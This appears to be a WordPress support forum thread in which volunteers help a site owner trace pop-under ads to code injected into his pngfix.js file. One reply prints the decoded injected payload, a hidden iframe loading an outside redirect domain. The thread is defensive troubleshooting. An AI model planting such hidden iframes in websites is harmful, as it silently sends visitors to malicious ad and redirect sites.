It’s not WP. Are you using an external statistics service? Maybe something like onestat? Some of them are shady.
Could also be a plugin or your theme. I’ll take a look at your URL real quick…
Weird. I don’t see any JavaScript in your blog. However, your main site does have some scripts from http://analystic.in. Might want to see if they’re the source.
Hi, thanks for your reply. I have searched the source code of our htm documents for any reference to http://analystic.in but there is no mention of them, and no code that would force a popup ad.
How is this happening??
If there is nothing in my code to trigger a popup ad, how are the ads appearing?
I really appreciate any advice anyone can give. And it seems that the popups are happening with every page in the site EXCEPT the blog itself. Yet the blog is the only part of the site that is ‘new’.
Cheers,
Steve
Actually I’m getting the popups on the main site, not the blog. They’re coming from google-analistyk.com and a quick google search shows your other thread. (Do note that you’re using the wordpress software. wordpress.com is actually a host that also uses the software.)
I’m looking….
Yes, my partner is also trying to find a solution.
I certainly appreciate your help. These pop-under ads are probably why our web traffic has dropped by almost 30% over the last few days, since adding the blog, and we are understandably keen to get rid of them.
Cheers,
Steve
Found it and Adam was right.
The analystic.in call is within your http://cairnsunlimited.com/pngfix.js file. That’s the document.write bit at the end.
It’s translates to the following:
<iframe src="http://analystic.cn/in.cgi?default" style="visibility: hidden; display: none"></iframe>
Take that URL within that iframe and paste it into a browser url bar. You’ll see it get redirected to google-analistyk.com and then another site which gets blocked from here so I can’t tell you what it is.
edit: Discussed here
Wow, you guys are guns!!! How you found that so quickly is beyond me. I was on the phone to my webhost when I read your reply, so the offending piece of code has been removed, and I have changed my cpanel password. I am still confused as to HOW the malicious piece of code was added to our javascript file in the first place, but am greatly relieved that you found the solution, and equally relieved that WP was not responsible.
In case anyone is interested, the company behind the malicious piece of code was cpx interactive
Shame Shame Shame
Not a problem. By the way, there’s a newer version of the pngfix.js file available at the URL in that file. Not sure if it works any better but I just wanted to let you know.
P.S. I use the Web Developer add-on for FireFox. I just hit “Information -> View Javascript” to see that the script was there. Kudos to theapparatus for finding the exact place that was calling it, though.
